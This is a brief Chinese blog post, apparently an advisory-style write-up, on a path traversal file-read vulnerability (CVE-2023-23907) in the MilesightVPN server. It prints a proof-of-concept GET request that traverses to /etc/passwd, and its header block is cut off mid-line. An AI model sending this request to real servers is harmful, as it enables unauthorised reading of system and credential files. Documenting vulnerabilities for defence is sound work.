Milesight VPN server.js 任意文件读取漏洞(CVE-2023-23907)
发布日期:2025-04-14 02:34:17 浏览次数:8 分类:精选文章

本文共 540 字,大约阅读时间需要 1 分钟。

MilesightVPN服务器文件读取漏洞分析

MilesightVPN是一款专为Milesight产品设计的VPN通道设置软件,其服务器接口在此次发现的安全漏洞中表现尤为突出。该漏洞使得攻击者能够通过特定的接口操作,读取系统关键文件和数据库配置信息,严重威胁网站的安全性。

该漏洞复现环境如下:

GET /../../../../../../../../../etc/passwd HTTP/1.1

Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-ur

该漏洞的POC(Proof of Concept,漏洞证据)表明,攻击者可以通过简单的GET请求访问系统核心文件,进一步导致服务器安全性全面受损。

经测试,该漏洞在MilesightVPN server.js的接口中存在,具体表现为攻击者可通过该接口读取包括数据库配置文件和系统配置文件在内的重要系统文件。

上一篇:Miller rabin
下一篇:MIF格式详解,javascript加载导出 MIF文件示例

发表评论

最新留言

路过,博主的博客真漂亮。。
[***.116.15.85]2025年05月05日 08时22分12秒